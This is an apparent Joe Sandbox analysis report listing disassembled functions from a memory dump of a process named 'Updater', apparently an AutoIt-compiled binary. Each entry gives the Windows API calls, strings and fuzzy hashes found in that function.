API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 315596fe2aa59c08be0ba13ffe1407b60b60f076ba7c7ab6a56c3434d331bf9d
Instruction ID: 775473fae79da74f8181e9610fa11d9ef7733a758050a447385713b1c58f6000
Opcode Fuzzy Hash: 315596fe2aa59c08be0ba13ffe1407b60b60f076ba7c7ab6a56c3434d331bf9d
Instruction Fuzzy Hash: 9841C371A00318AFDF219F64CC49BEA7BA9FF48350F11412AFD19E7281D7799D908B90

Function 014AA659 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 014AA6F2
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 014AA70E
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 014AA747
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 014AA7D3
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 014AA7F2
VariantCopy.OLEAUT32(?), ref: 014AA827

Strings

, xrefs: 014AA673

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
Instruction ID: b8db78e9bd56380010194cd908b5fa97bed4da4feae08fd5e339ef8c67bea76b
Opcode Fuzzy Hash: d86e1f33596d4aef53c3cfaa159972970693b9ff1c5b14be54ccb225d1272e81
Instruction Fuzzy Hash: 0051FD7590022D9BDB62DB59C880BD9B7FCAF6C204F9141EAE619E7211D630AF85CF60

Function 0073CAE1 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0073CB80
IsMenu.USER32(00000000), ref: 0073CBA0
CreatePopupMenu.USER32 ref: 0073CBD6
GetMenuItemCount.USER32(00000000), ref: 0073CC34
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0073CC5C

Strings

0, xrefs: 0073CB2B
2, xrefs: 0073CBBA

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: b5302d9bfe602dd40d97e7b38c36271448d4a78f796d116cdb6c1e1195f79d77
Instruction ID: 6b520127f11d6f9d637f1f85abb0b7867628695976eae65ec90be6c806adc225
Opcode Fuzzy Hash: b5302d9bfe602dd40d97e7b38c36271448d4a78f796d116cdb6c1e1195f79d77
Instruction Fuzzy Hash: 4D51A070A00205DFEF22CF68D989BAEBBF4EF49314F145219E51AE7292D3789D40CB61

Function 0073D612 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0073D6B1

Strings

warning, xrefs: 0073D69A
stop, xrefs: 0073D682
blank, xrefs: 0073D633
question, xrefs: 0073D66A
info, xrefs: 0073D652

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 7d10ff9b0aa794a59b171cfe6674f9ce0ad1022f4d8f7fa9c3d879bb30d582a7
Instruction ID: 105e5456d231cba1d672f855bd33fe796befd3eff133d6e12b23cc3bd872a12b
Opcode Fuzzy Hash: 7d10ff9b0aa794a59b171cfe6674f9ce0ad1022f4d8f7fa9c3d879bb30d582a7
Instruction Fuzzy Hash: C811DB3271C70BFBF7255A59BC43D6F679CAF15394F20401EF92856182EBB86E5081AC

Function 0073EC7C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0073EC97
gethostname.WSOCK32(?,00000100), ref: 0073ECB1
gethostbyname.WSOCK32(?), ref: 0073ECBE
inet_ntoa.WSOCK32(?), ref: 0073ED00
_strcat.LIBCMT ref: 0073ED0E
WSACleanup.WSOCK32 ref: 0073ED33

Strings

0.0.0.0, xrefs: 0073ECDC

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 21185f0d8ade6b7c14185332246c8281efdb23dbf10c22221b2884fae4053558
Instruction ID: cebcaea096f5669704ebca4c41818422d55e2c1b4b02d09a7c036fd7d3d77009
Opcode Fuzzy Hash: 21185f0d8ade6b7c14185332246c8281efdb23dbf10c22221b2884fae4053558
Instruction Fuzzy Hash: 4E113A32A10218ABEB3077609C09EFE376CEF51310F000079F509970D2EEB99D418665

Function 014A0309 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,014A03D3,?,?,?,?,?,?,?,014A047F,0149F014), ref: 014A0342
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,014A03D3,?,?,?,?,?,?,?,014A047F), ref: 014A0348
GetStdHandle.KERNEL32(000000F5,014A0391,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,014A03D3), ref: 014A035D
WriteFile.KERNEL32(00000000,000000F5,014A0391,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,014A03D3), ref: 014A0363
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 014A0381

Strings

Runtime error at 00000000, xrefs: 014A033B, 014A037A
Error, xrefs: 014A0375

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: f3b785d70ae12f18e2f9a276c5acfbd1d18a3f711ecb20131d173a157f2a0f06
Instruction ID: 7b11b6ea047d2381ffd10fbf3b1195cc67c733bd711cba6a1097290559adeb85
Opcode Fuzzy Hash: f3b785d70ae12f18e2f9a276c5acfbd1d18a3f711ecb20131d173a157f2a0f06
Instruction Fuzzy Hash: C2F0BB50A843417BFF30A69A9CC6F9F2748D771B10F74410FB2985A4F5D7F045849362

Function 0076A94E Relevance: 12.3, APIs: 8, Instructions: 262windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B

GetSystemMetrics.USER32(0000000F), ref: 0076A98F
GetSystemMetrics.USER32(0000000F), ref: 0076A9AF
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0076ABF3
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0076AC11
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0076AC32
ShowWindow.USER32(00000003,00000000), ref: 0076AC51
InvalidateRect.USER32(?,00000000,00000001), ref: 0076AC76
DefDlgProcW.USER32(?,00000005,?,?), ref: 0076AC99

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 8ad8399ac088fc15a16e2d3914b3617ec5b7009962b343a147a4211e4b45d951
Instruction ID: 62f297fb1b87a2d03d35d7df82dd8eadffe93a3c343f86a3d2bf901158bd293c
Opcode Fuzzy Hash: 8ad8399ac088fc15a16e2d3914b3617ec5b7009962b343a147a4211e4b45d951
Instruction Fuzzy Hash: C4B18771600219EFCF14CF68C9857AA7BB2FF44701F18C069ED4AAA295DB78A950CF61

Function 006E544C Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000024,000000FF,00000000,?,?,00728E87,00000004,00000000,00000000), ref: 006E54CC
ShowWindow.USER32(00000024,00000006,00000000,?,?,00728E87,00000004,00000000,00000000), ref: 00728EE3
ShowWindow.USER32(00000024,000000FF,00000000,?,?,00728E87,00000004,00000000,00000000), ref: 00728F66

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 1f8b3c212ab60d91b64f823742c6964405cd4c1c8dc17f2a4b756978365d39cf
Instruction ID: 5ff33d6e7f994d604bb14d55b77b129e735533130908e873ceeaba78ed758d18
Opcode Fuzzy Hash: 1f8b3c212ab60d91b64f823742c6964405cd4c1c8dc17f2a4b756978365d39cf
Instruction Fuzzy Hash: BD412E30716BC0DACB75CB2ED94877A7BD3AB9131AF14840DE0474A6E1CA79A8C1C721

Function 00711452 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 007114FE
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00711581
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00711614
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0071162B

Part of subcall function 0070282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007116A7
__freea.LIBCMT ref: 007116D2
__freea.LIBCMT ref: 007116DE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: dfa1e8de3c5d906e1a7d01bce687cfa6c50c5c2fa18a85ff2cb8cddac6a9918b
Instruction ID: 5dc30947452a7d9f6b87228a64aa75f3cce087a0747c8e6bbebe503cbabf8277
Opcode Fuzzy Hash: dfa1e8de3c5d906e1a7d01bce687cfa6c50c5c2fa18a85ff2cb8cddac6a9918b
Instruction Fuzzy Hash: BF91B272E0025A9BDF208E6CC845AEE7BB59B49750F984659EE01EF1C1DB2DDC80CB60

Function 00755123 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00755248
VariantInit.OLEAUT32(?), ref: 00755349
VariantClear.OLEAUT32(?), ref: 00755353
VariantClear.OLEAUT32(?), ref: 007553B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0075532C
Null Object assignment in FOR..IN loop, xrefs: 007551D8, 00755306, 007553BE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: e6aecedf6fe91ceb630711f874eded73a051fdd24cbd7c013abba32c84535ca5
Instruction ID: cf9a82a3456d9ff84c07b0cd5ff8218848922c30f2903236e62712c9e47628df
Opcode Fuzzy Hash: e6aecedf6fe91ceb630711f874eded73a051fdd24cbd7c013abba32c84535ca5
Instruction Fuzzy Hash: BF91B371A00619EBDF24CF94DC54FEEBBB8EF45315F108159F909AB240D7B89949CBA0

Function 007544DE Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007544FE
CharUpperBuffW.USER32(?,?), ref: 0075460B
_wcslen.LIBCMT ref: 00754616
VariantClear.OLEAUT32(?), ref: 00754790

Part of subcall function 00741ABE: VariantInit.OLEAUT32(00000000), ref: 00741AFE
Part of subcall function 00741ABE: VariantCopy.OLEAUT32(?,?), ref: 00741B07
Part of subcall function 00741ABE: VariantClear.OLEAUT32(?), ref: 00741B13

Strings

Incorrect Parameter format, xrefs: 00754540, 0075470C
AUTOIT.ERROR, xrefs: 00754611, 00754622

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: c55dfd2ca922db52470cb4302db7a7b8c2052b9d98d8f4f500edbfb5d0adc9e0
Instruction ID: ef27ef0305c150154ed0a331026a4eaaea80a122f8e2656f76624e38457eaf88
Opcode Fuzzy Hash: c55dfd2ca922db52470cb4302db7a7b8c2052b9d98d8f4f500edbfb5d0adc9e0
Instruction Fuzzy Hash: 4F81AF71A04201EFCB10DF24C484AAAB7E5EF89354F04896DFC4A8B351D775ED49CB85

Function 0076885A Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(014155A0), ref: 007688F4
IsWindowEnabled.USER32(014155A0), ref: 00768900
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007689E4
SendMessageW.USER32(014155A0,000000B0,?,?), ref: 00768A1B
IsDlgButtonChecked.USER32(?,?), ref: 00768A58
GetWindowLongW.USER32(014155A0,000000EC), ref: 00768A7A
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00768A92

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: c7767a5bcb14ff9d38425d7f07df36d765632367067b280d88e24b35c840cb07
Instruction ID: 8b97c95798513660e1e316efad8a19abc91b3ab70f7219e4809c6656891e822b
Opcode Fuzzy Hash: c7767a5bcb14ff9d38425d7f07df36d765632367067b280d88e24b35c840cb07
Instruction Fuzzy Hash: 55716A34A04305AFDB609FA4C894FBABBA5EF49300F14425AFD4797252CB79BC51DB12

Function 00762A1F Relevance: 10.7, APIs: 7, Instructions: 197windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00762AA5
GetMenuItemCount.USER32(00000000), ref: 00762AD7
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00762AFF
_wcslen.LIBCMT ref: 00762B35
GetMenuItemID.USER32(?,?), ref: 00762B6F
GetSubMenu.USER32(?,?), ref: 00762B7D

Part of subcall function 00733E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00733EB2
Part of subcall function 00733E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733EC3
Part of subcall function 00733E94: GetCurrentThreadId.KERNEL32 ref: 00733ECA
Part of subcall function 00733E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,0073368B), ref: 00733ED1

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00762C05

Part of subcall function 0073F7F5: Sleep.KERNEL32 ref: 0073F86D

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Menu$Thread$ItemMessage$AttachCountCurrentInputPostProcessSendSleepStringTimeoutWindow_wcslen
String ID:
API String ID: 3648899353-0
Opcode ID: bdd781207ffff4bf242348170de7392632876ceee57062e0ad3dc4c1cb6fd6e5
Instruction ID: 0f09e8bde226f2597063f7c5fcf09905223cfe856aaec8af0823315bf9814b3f
Opcode Fuzzy Hash: bdd781207ffff4bf242348170de7392632876ceee57062e0ad3dc4c1cb6fd6e5
Instruction Fuzzy Hash: A9718E75E00615AFCB50DF64C845AAEB7F5EF48310F148459ED1AEB342DB78AE428B90

Function 0073F252 Relevance: 10.7, APIs: 7, Instructions: 177filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0073EC33: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0073DCD6,?), ref: 0073EC50

Part of subcall function 0073EC33: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0073DCD6,?), ref: 0073EC69

GetFileAttributesW.KERNEL32(?), ref: 0073F29C
GetFileAttributesW.KERNEL32(?), ref: 0073F2B7
lstrcmpiW.KERNEL32(?,?), ref: 0073F2E6
MoveFileW.KERNEL32(?,?), ref: 0073F31B
_wcslen.LIBCMT ref: 0073F454
_wcslen.LIBCMT ref: 0073F46C
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0073F4B9

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: File$AttributesFullNamePath_wcslen$MoveOperationlstrcmpi
String ID:
API String ID: 4252263244-0
Opcode ID: 8c0f55dd95786f80da45e63fa5853e3e2573acd1b0a0b2d38126dd969ea1fe7c
Instruction ID: 5b740bcc385ddd13e7de94d8642bce20eb27111171b63e58b38bf2e130ad7b69
Opcode Fuzzy Hash: 8c0f55dd95786f80da45e63fa5853e3e2573acd1b0a0b2d38126dd969ea1fe7c
Instruction Fuzzy Hash: F75185B19083849BD764DBA4D8859DF73DCAF84350F40492FF689C3192EF78E5488766

Function 0070525C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,007059D1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0070529E
__fassign.LIBCMT ref: 00705319
__fassign.LIBCMT ref: 00705334
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0070535A
WriteFile.KERNEL32(?,FF8BC35D,00000000,007059D1,00000000,?,?,?,?,?,?,?,?,?,007059D1,?), ref: 00705379
WriteFile.KERNEL32(?,?,00000001,007059D1,00000000,?,?,?,?,?,?,?,?,?,007059D1,?), ref: 007053B2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 419fc5771b4189929147d0f3e611ead623fc2ba8158de3f8f3e944fc7484fb2f
Instruction ID: 2aaeb75f1dff57dca4949be126e511faa2f77ffc8a7ab31952bf7e194f0edf54
Opcode Fuzzy Hash: 419fc5771b4189929147d0f3e611ead623fc2ba8158de3f8f3e944fc7484fb2f
Instruction Fuzzy Hash: B9517E71A00649DFDB10CFA8D845AEFBBF8EF09300F14425AE955E7291E7B49A41CB64

Function 007385E6 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00738629
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0073864F
SysAllocString.OLEAUT32(00000000), ref: 00738652
SysAllocString.OLEAUT32(?), ref: 00738670
SysFreeString.OLEAUT32(?), ref: 00738679
StringFromGUID2.OLE32(?,?,00000028), ref: 0073869E
SysAllocString.OLEAUT32(?), ref: 007386AC

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 744fba22a652fe00eafb322177fde2be83dff0869ecd9aa9696bcc5d8710ad0c
Instruction ID: 9d54c1fa671a4b55cbcddaed263fb3f117dd93308652503528f92fe19e08eda3
Opcode Fuzzy Hash: 744fba22a652fe00eafb322177fde2be83dff0869ecd9aa9696bcc5d8710ad0c
Instruction Fuzzy Hash: 8021D672604309EFAF50DFA8CC85CBA77ACEB08364B048125FE15DB252DA78DC418755

Function 007386BF Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00738704
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0073872A
SysAllocString.OLEAUT32(00000000), ref: 0073872D
SysAllocString.OLEAUT32 ref: 0073874E
SysFreeString.OLEAUT32 ref: 00738757
StringFromGUID2.OLE32(?,?,00000028), ref: 00738771
SysAllocString.OLEAUT32(?), ref: 0073877F

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
